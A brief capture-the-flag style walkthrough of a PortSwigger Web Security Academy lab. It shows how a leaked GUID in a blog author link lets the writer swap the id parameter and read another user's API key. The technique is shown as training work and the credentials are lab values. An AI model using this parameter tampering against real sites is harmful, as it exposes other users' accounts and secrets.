| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Horizontal Privilege Escalation, IDOR with GUIDs) |
| Difficulty | Apprentice |
| Objective | Find the GUID for carlos, then submit his API key as the solution |
User ID Controlled by Request Parameter, with Unpredictable User IDs¶
Log in as wiener:peter:
My Account
Your username is: wiener
Your API Key is: XWM6DGHlCIbc3D9cz8TJmvYT3k772aYQ
Intercepting the account page request itself:
GET /my-account?id=394d99cd-e1d8-41db-a722-b1cabe1ef61d HTTP/2
Our own GUID is sitting in id. Since GUIDs aren't guessable, the lab hint says it leaks elsewhere — checking blog posts. Navigating to a post made by carlos:
Inspecting the author link:
<span id="blog-author"><a href="/blogs?userId=837bd349-0dd3-4b64-8ee9-84b64dea4d0d">carlos</a></span>
There's Carlos's GUID. Going to:
web-security-academy.net/my-account?id=837bd349-0dd3-4b64-8ee9-84b64dea4d0d
Carlos's account page renders, including his API key.
And that gets the solved